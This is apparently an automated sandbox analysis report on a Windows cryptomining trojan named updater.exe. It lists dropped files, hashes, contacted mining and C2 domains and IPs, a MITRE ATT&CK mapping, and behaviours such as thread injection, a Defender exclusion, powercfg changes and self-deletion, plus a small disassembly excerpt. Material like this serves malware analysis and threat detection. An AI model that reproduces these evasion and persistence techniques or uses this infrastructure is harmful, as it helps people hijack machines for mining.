          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

          Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\updater.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\updater.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the count badge shown in the report for that technique)
• Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
• Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
• Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
• Execution: 11 Windows Management Instrumentation, 1 Service Execution, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
• Persistence: 11 Windows Service, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
• Privilege Escalation: 11 Windows Service, 111 Process Injection, 1 DLL Side-Loading, Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
• Defense Evasion: 1 Masquerading, 1 Disable or Modify Tools, 12 Virtualization/Sandbox Evasion, 111 Process Injection, 1 Deobfuscate/Decode Files or Information, 2 Obfuscated Files or Information, 1 DLL Side-Loading, 11 File Deletion
• Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
• Discovery: 211 Security Software Discovery, 12 Virtualization/Sandbox Evasion, 1 Process Discovery, 1 Application Window Discovery, 12 System Information Discovery, Wi-Fi Discovery, Remote System Discovery, System Owner/User Discovery
• Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
• Collection: 1 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
• Command and Control: 1 Encrypted Channel, 1 Non-Standard Port, 2 Non-Application Layer Protocol, 2 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
• Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
• Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Behavior Graph ID: 1526527, Sample: updater.exe, Start date: 06/10/2024, Architecture: WINDOWS, Score: 100
• Contacted domains: minerchenzhi888.top, auto.c3pool.org
• Signatures on the sample: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures
• updater.exe (first instance) started; dropped C:\Windows\Temp\zlvyxohjpfnw.sys (PE32+); signatures: Multi AV Scanner detection for dropped file; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver; child processes: svchost.exe, powershell.exe, cmd.exe, 10 other processes
• updater.exe (second instance) started; dropped C:\ProgramData\Google\Chrome\updater.exe (PE32+); signatures: Self deletion via cmd or bat file; Uses powercfg.exe to modify the power settings; Modifies power options to not sleep / hibernate; child processes: powershell.exe, cmd.exe, cmd.exe, 13 other processes
• svchost.exe: connections to 5.161.70.189 (ports 23333, 49757; HETZNER-ASDE, Germany) and to minerchenzhi888.top at 172.67.162.29 (ports 49758, 49760, 49761; CLOUDFLARENETUS, United States); signatures: Query firmware table information (likely to detect VMs); Found strings related to Crypto-Mining; Detected Stratum mining protocol on the 5.161.70.189 connection
• Children of the first instance: powershell.exe started conhost.exe; cmd.exe started 2 other processes; the 10 other processes started 9 other processes
• Children of the second instance: powershell.exe (Loading BitLocker PowerShell Module) started conhost.exe; one cmd.exe started 2 other processes; the other cmd.exe started conhost.exe and wusa.exe; the 13 other processes started conhost.exe and 12 other processes

Source | Detection | Scanner | Label
updater.exe: 96% (ReversingLabs, Win64.Trojan.MintZard)
updater.exe: 82% (Virustotal)
Source | Detection | Scanner | Label
C:\ProgramData\Google\Chrome\updater.exe: 96% (ReversingLabs, Win64.Trojan.MintZard)
C:\ProgramData\Google\Chrome\updater.exe: 82% (Virustotal)
C:\Windows\Temp\zlvyxohjpfnw.sys: 5% (ReversingLabs)
C:\Windows\Temp\zlvyxohjpfnw.sys: 4% (Virustotal)
No Antivirus matches
Source | Detection | Scanner | Label
auto.c3pool.org: 6% (Virustotal)
minerchenzhi888.top: 12% (Virustotal)
Source | Detection | Scanner | Label
http://minerchenzhi888.top/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu=: 9% (Virustotal)
https://xmrig.com/docs/algorithms: 2% (Virustotal)
http://minerchenzhi888.top/api/endpoint.php: 9% (Virustotal)
http://minerchenzhi888.top/api/endpoint.phphlhwzjwrxrewbblx: 9% (Virustotal)
Name | IP | Active | Malicious | Antivirus Detection | Reputation
auto.c3pool.org (5.161.65.155): active true, malicious false, reputation unknown
minerchenzhi888.top (172.67.162.29): active true, malicious false, reputation unknown
Name | Malicious | Antivirus Detection | Reputation
http://minerchenzhi888.top/api/endpoint.php: malicious false, reputation unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://minerchenzhi888.top/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu= (source: svchost.exe, 0000003E.00000002.346493278590.00000254DD65F000.00000004.00000020.00020000.00000000.sdmp): malicious false, reputation unknown
http://minerchenzhi888.top/api/endpoint.phpT (source: svchost.exe, 0000003E.00000002.346493622809.00000254DD6F2000.00000004.00000020.00020000.00000000.sdmp): malicious false, reputation unknown
https://172.94.1q (source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp): malicious false, reputation unknown
http://minerchenzhi888.top/api/endpoint.phphlhwzjwrxrewbblx (source: svchost.exe, 0000003E.00000003.345290459404.00000254DD671000.00000004.00000020.00020000.00000000.sdmp): malicious false, reputation unknown
https://xmrig.com/docs/algorithms (source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp): malicious false, reputation unknown
IP | Domain | Country | ASN | ASN Name | Malicious
5.161.70.189: domain unknown, Germany, ASN 24940 HETZNER-ASDE, malicious true
172.67.162.29: minerchenzhi888.top, United States, ASN 13335 CLOUDFLARENETUS, malicious false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1526527
Start date and time: 2024-10-06 01:44:02 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Number of new started processes analysed: 63
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: updater.exe
Detection: MAL
Classification: mal100.spyw.evad.mine.winEXE@93/12@2/2
EGA Information:
• Successful, ratio: 75%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Execution Graph export aborted for target svchost.exe, PID 6248 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
Time | Type | Description
19:46:09 API Interceptor: 1x Sleep call for process: updater.exe modified
19:46:10 API Interceptor: 24x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
5.161.70.189
LisectAVT_2403002B_48.exe: malicious (Bdaejec, BlackMoon)
4xHN38uqxB.exe: malicious (DoublePulsar, ETERNALBLUE, Xmrig)
logor.elf: malicious (Xmrig)
172.67.162.29
http://adserver.tunisienumerique.com/www/delivery/ajs.php?zoneid=23&cb=97486157595&charset=UTF-8&loc=http://www.tunisie.gov.tn/&referer=http://consulat-tunisie.ca/: malicious (Unknown)
• adserver.tunisienumerique.com/www/delivery/ajs.php?zoneid=23&cb=97486157595&charset=UTF-8&loc=http://www.tunisie.gov.tn/&referer=http://consulat-tunisie.ca/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
auto.c3pool.org
LisectAVT_2403002B_48.exe: malicious (Bdaejec, BlackMoon)
• 5.75.158.61
LisectAVT_2403002B_55.exe: malicious (Xmrig)
• 5.75.158.61
LisectAVT_2403002A_416.exe: malicious (Xmrig)
• 5.75.158.61
o00DuIdf3j.exe: malicious (Xmrig)
• 5.75.158.61
o00DuIdf3j.exe: malicious (Xmrig)
• 5.75.158.61
xB6r0wPRyb.exe: malicious (Xmrig)
• 5.75.158.61
K4gsPJGEi4.exe: malicious (Xmrig)
• 5.75.158.61
x00zm3KVwb.exe: malicious (Xmrig)
• 88.198.117.174
4xHN38uqxB.exe: malicious (DoublePulsar, ETERNALBLUE, Xmrig)
• 5.161.70.189
UO2z4n1Sxx.exe: malicious (Unknown)
• 88.198.117.174
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HETZNER-ASDE
81zBpBAWwc.exe: malicious (RHADAMANTHYS)
• 136.243.190.131
bomb.exe: malicious (Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar)
• 49.12.197.9
https://s3.amazonaws.com/r3e1272/Rco.html#4eyOul3510eTKK19nejdimaazo189TBUDIERNFIMTFBQ264510CRSG907S11: malicious (Phisher)
• 5.161.250.225
w4DO1Z18yg.wsf: malicious (SmokeLoader)
• 188.40.141.211
UkHkCa3IYV.wsf: malicious (SmokeLoader)
• 188.40.141.211
3312.PDF.wsf: malicious (SmokeLoader)
• 188.40.141.211
RmbF3635xY.exe: malicious (SmokeLoader)
• 188.40.141.211
https://indexconectada.net.br/: malicious (Unknown)
• 85.10.195.17
https://iasitvlife.ro: malicious (Unknown)
• 49.12.228.110
https://iasitvlife.ro/stiri/local/a-sunat-la-call-center-anticoruptie-si-a-denuntat-un-functionar-public/: malicious (HTMLPhisher)
• 49.12.228.110
CLOUDFLARENETUS
file.exe: malicious (LummaC)
• 172.67.151.30
http://www.grandsignatureyercaud.com/: malicious (Unknown)
• 104.21.51.144
http://www.nesianlife.com/: malicious (Unknown)
• 104.18.39.195
https://daf2019.com/8/02: malicious (Unknown)
• 172.65.190.172
                    https://wtm.entree-plat-dessert.com/r/eNqtj01vgkAQhn8NvVXcL1gOplGBqgUraGrx0gC7iquAwqLVX99Ve2iT9ubMHN6ZyeSd56hbEBqA6oCbGCPCAQM0phBhC7IUJHBp4phQznVAEdGxSfQEotRYwjYyKWMGQTFoQwMCK4mxCmupt1U2+lPTyaTc1RrqatBVxVmLF7Li/HG3jeUj43XNK9lKy/yyRy7nGrJv32jQUHf2UdkpuVfSXC6C9bAo5mAqNzN3IcLBoB0KacxNSptTOZpGXmrlfX/q7OFn8n7yUEaceiRW/VPoRudGgwT2crMOCCGr4Xl86V1zIgp5juC1sfd2lCXe8KU7Pryth8GiG+RWUUQEilF2skVEzh6ejS3PwcBeGTPfB5zNXTo5YPHsrF+vDscJq+zellaxHwrkrW62I0kdAcp+Qvz5oCw3ySY+bGyF1sj8oy6bKr2wF9vvSc7ZusnVJOMx49UDSzt34P9N/4P9DuR/cP9H/QVY0sGGGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
https://blmphilly.com/: malicious (Unknown)
• 172.66.0.227
https://wtm.entree-plat-dessert.…: malicious (Unknown)
• 172.67.186.254
                    https://wtm.entree-plat-dessert.com/r/eNpNj1uTojAQhX8N+6aYG4SHqS0VWHXB9Vbj4stUCAGDXJyQ6OKv38zbdPXDV+d096l+ugGEHqAuED7GiAhQAMooRDiABQc5LH3MCBXCBRQRF/vEzSHiXglnyKdF4RHEwAx6EAQ5w7aC0vVcQNze/WnerlrfBwfNHRjbZlybacuUFLxhUolpqazKjRxkJyxpprSYMDPJVc/7Rk4GZriYcKPUOOFWcuASYD/wCJyy4e6gmOmPVhTStA4KRaE/bIIDPdZab2E9bonJqrPus+F925pGy+8DQ28UF1/LnVZC3BumCzEMQukfBX/zy8terrvuDI76doov9WG1mh1q7Z19Ss3Yb45ZwoN2mR6jT/gv/zsm6EqiYVNXy/EQZy/jwEXrD3tCSLV+be2H/q7u9CuDFsPPMLvmyfr3fPt4l+v9Zb5vg67LCKw31zGsM/JK8GkbJBEGYeWd0hSI4hzT3QPXvyL5x95+7goVLhqqWHqoUVJ9xW00jWrQL3OSnld9f8tv7HEL/wMooptNGet hashmaliciousUnknownBrowse
                    • 104.18.38.76
                    https://wtm.entree-plat-dessert.com/r/eNqtj09vgkAQxT8NvdV1/8FyMI0KVC1YQVOLlwbYRV0FFBatfvqi9tAm7c3JHOa9yeTN7whMhHTIABQGIZgKyCGLGMLERDyBMUoNElEmBIAMU0AMCmKEEz1FbWwwznWKI9hGOoJmHJGmzBRAAjAGNXiqOyuldpWGuxpymha8JXJVCvG420bqkYuqEqVqJUV22WNHCA1bt380pDd31rEJbMZ9Mxrpwl8P83wOp2ozcxYyGAzagVT63GCsPhWjaegmZtb3pvYefcbvJxevqF2N5LJ/CpzwXGuIol5mVD6ldDk8jy/aMSYyV+cQXYW1t8JV7A5fuuPD23roL7p+ZuZ5SJEcrU6WDOnZJbOx6doEWkt95nlQ8LnDJgcin+316zXhOOGl1duyMvICid3lLXakmC1h0Y+pNx8UxSbeRIeN1aDVKvuoirpMLuz59tvJBF/XWeOkRaFE+cCTzh34f9P/YL8D+R/c/1F/AYULwhc=Get hashmaliciousUnknownBrowse
                    • 188.114.96.3
https://wtm.entree-plat-dessert.…: malicious (Unknown)
• 104.21.19.169
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Windows\Temp\zlvyxohjpfnw.sys
7QiAmg58Jk.exe: malicious (Metasploit, Meterpreter, Xmrig)
LnK0dS8jcA.exe: malicious (Xmrig)
file.exe: malicious (Xmrig)
SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe: malicious (Xmrig)
file.exe: malicious (Amadey, BitCoin Miner, SilentXMRMiner)
S0FTWARE.exe: malicious (Go Injector, Vidar, Xmrig)
Gw2G72kSsY.exe: malicious (Xmrig)
file.exe: malicious (Xmrig)
file.exe: malicious (Xmrig)
System.exe: malicious (Flesh Stealer, Xmrig)
Process: C:\Users\user\Desktop\updater.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2728960
Entropy (8bit): 6.5920384034620385
Encrypted: false
SSDEEP: 49152:tgmXm6CldAIFE+WUQPiOpDrx04lD3x/7Mzub42MlGjGudSLfO:tjXm6CA4VtOpp04l97MqbYlGSawf
MD5: A0C374F31894AA332D158F56608C89C3
SHA1: 0236445A761FCA6DCDA1B9014BEB78198DFAE9F8
SHA-256: CE7CA5446E66CE1E9190E16922FA33FEBB0789F27561AA820D1D1BF14C86CFE1
SHA-512: 5596F10E8A0B7233B8A3AC76C3E3827E58F1213B2B54349D4F89CCB34D05032806EE6FE57CBDD8709898D53088F87404252D847BAAE0311693A451108519770B
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 96%
• Antivirus: Virustotal, Detection: 82%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........).....@..........@..............................*...........`.....................................................<.....(. .....(...............*.x...............................(.......8...........0...X............................text............................... ..`.rdata... ......."..................@..@.data...P.'.......'.................@....pdata........(.......(.............@..@.00cfg........(.......(.............@..@.tls..........(.......(.............@....rsrc... .....(.......(.............@..@.reloc..x.....*.......).............@..B........................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
                                        Preview:@...e...........................................................
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
                                        Preview:@...e...........................................................
                                        Process:C:\ProgramData\Google\Chrome\updater.exe
                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):14544
                                        Entropy (8bit):6.2660301556221185
                                        Encrypted:false
                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 5%
                                        • Antivirus: Virustotal, Detection: 4%, Browse
                                        Joe Sandbox View:
                                        • Filename: 7QiAmg58Jk.exe, Detection: malicious, Browse
                                        • Filename: LnK0dS8jcA.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: S0FTWARE.exe, Detection: malicious, Browse
                                        • Filename: Gw2G72kSsY.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: System.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Entropy (8bit):6.5920384034620385
                                        TrID:
                                        • Win64 Executable GUI (202006/5) 92.65%
                                        • Win64 Executable (generic) (12005/4) 5.51%
                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                        • DOS Executable Generic (2002/1) 0.92%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:updater.exe
                                        File size:2'728'960 bytes
                                        MD5:a0c374f31894aa332d158f56608c89c3
                                        SHA1:0236445a761fca6dcda1b9014beb78198dfae9f8
                                        SHA256:ce7ca5446e66ce1e9190e16922fa33febb0789f27561aa820d1d1bf14c86cfe1
                                        SHA512:5596f10e8a0b7233b8a3ac76c3e3827e58f1213b2b54349d4f89ccb34d05032806ee6fe57cbdd8709898d53088f87404252d847baae0311693a451108519770b
                                        SSDEEP:49152:tgmXm6CldAIFE+WUQPiOpDrx04lD3x/7Mzub42MlGjGudSLfO:tjXm6CA4VtOpp04l97MqbYlGSawf
                                        TLSH:62C523C5B8084A75D94CA4FBE0B2DE71116F7C841AB145CE8EEA4C7ABF769D8203605F
                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........).....@..........@..............................*...........`........................................
                                        Icon Hash:f1e6e8f0ece49245
                                        Entrypoint:0x140001140
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x140000000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x661FD2BD [Wed Apr 17 13:46:37 2024 UTC]
                                        TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:de41d4e0545d977de6ca665131bb479a
                                        Instruction
                                        dec eax
                                        sub esp, 28h
                                        dec eax
                                        mov eax, dword ptr [00008ED5h]
                                        mov dword ptr [eax], 00000001h
                                        call 00007FB834400A4Fh
                                        nop
                                        nop
                                        nop
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop
                                        inc ecx
                                        push edi
                                        inc ecx
                                        push esi
                                        push esi
                                        push edi
                                        push ebx
                                        dec eax
                                        sub esp, 20h
                                        dec eax
                                        mov eax, dword ptr [00000030h]
                                        dec eax
                                        mov edi, dword ptr [eax+08h]
                                        dec eax
                                        mov esi, dword ptr [00008EC9h]
                                        xor eax, eax
                                        dec eax
                                        cmpxchg dword ptr [esi], edi
                                        sete bl
                                        je 00007FB834400A70h
                                        dec eax
                                        cmp edi, eax
                                        je 00007FB834400A6Bh
                                        dec esp
                                        mov esi, dword ptr [0000AAC9h]
                                        nop word ptr [eax+eax+00000000h]
                                        mov ecx, 000003E8h
                                        inc ecx
                                        call esi
                                        xor eax, eax
                                        dec eax
                                        cmpxchg dword ptr [esi], edi
                                        sete bl
                                        je 00007FB834400A47h
                                        dec eax
                                        cmp edi, eax
                                        jne 00007FB834400A29h
                                        dec eax
                                        mov edi, dword ptr [00008E90h]
                                        mov eax, dword ptr [edi]
                                        cmp eax, 01h
                                        jne 00007FB834400A4Eh
                                        mov ecx, 0000001Fh
                                        call 00007FB8344096E4h
                                        jmp 00007FB834400A69h
                                        cmp dword ptr [edi], 00000000h
                                        je 00007FB834400A4Bh
                                        mov byte ptr [00289529h], 00000001h
                                        jmp 00007FB834400A5Bh
                                        mov dword ptr [edi], 00000001h
                                        dec eax
                                        mov ecx, dword ptr [00008E7Ah]
                                        dec eax
                                        mov edx, dword ptr [00008E7Bh]
                                        call 00007FB8344096DBh
                                        mov eax, dword ptr [edi]
                                        cmp eax, 01h
                                        jne 00007FB834400A5Bh
                                        dec eax
                                        mov ecx, dword ptr [00008E50h]
                                         Name | Virtual Address | Virtual Size | Is in Section
                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb998 | 0x3c | .rdata
                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x28f000 | 0x10c20 | .rsrc
                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x28c000 | 0x18c | .pdata
                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2a0000 | 0x78 | .reloc
                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_TLS | 0xa0a0 | 0x28 | .rdata
                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa410 | 0x138 | .rdata
                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IAT | 0xbb30 | 0x158 | .rdata
                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                         Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                         .text | 0x1000 | 0x8ff6 | 0x9000 | bf829d3dba623ef23a06748dca6b4f77 | False | 0.4942491319444444 | data | 6.147852711939561 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                         .rdata | 0xa000 | 0x20ec | 0x2200 | 2507e8395728b99ff2f56c30c4b9ae28 | False | 0.4596737132352941 | data | 4.697090361425568 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         .data | 0xd000 | 0x27ea50 | 0x27d800 | 65e7307a23b55acf23372f2cecd82782 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                         .pdata | 0x28c000 | 0x18c | 0x200 | d262f440c13f4737b12ded5497cc5912 | False | 0.513671875 | data | 3.191401048077294 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         .00cfg | 0x28d000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         .tls | 0x28e000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
